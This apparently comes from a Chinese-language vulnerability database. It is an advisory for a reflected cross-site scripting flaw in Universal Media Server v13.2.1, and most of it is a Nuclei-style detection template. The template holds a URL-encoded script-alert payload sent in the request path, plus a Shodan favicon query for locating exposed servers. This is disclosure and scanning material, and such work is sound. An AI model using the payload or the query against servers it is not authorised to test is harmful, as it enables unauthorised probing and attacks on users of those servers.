universal-media-xss: Universal Media Server v13.2.1 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: Universal Media Server | POC: 已公开

漏洞描述

Universal Media Server v13.2.1 CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability.

PoC代码[已公开]

id: universal-media-xss

info:
  name: Universal Media Server v13.2.1 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Universal Media Server v13.2.1 CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability.
  remediation: Fixed in version 13.2.2
  reference:
    - https://packetstormsecurity.com/files/171754/Universal-Media-Server-13.2.1-Cross-Site-Scripting.html
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-902890504
  tags: xss,universal,media,unauth,packetstorm,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "404 - File Not Found"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210086cc8711e7d7a5298b64ab4df61cd4a005d94e615d6f0d5f052fb681aa45430502210082a5cfb8780dec5df256dcca3e18c150a8970fa2c5565c149c1197bb523b978f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐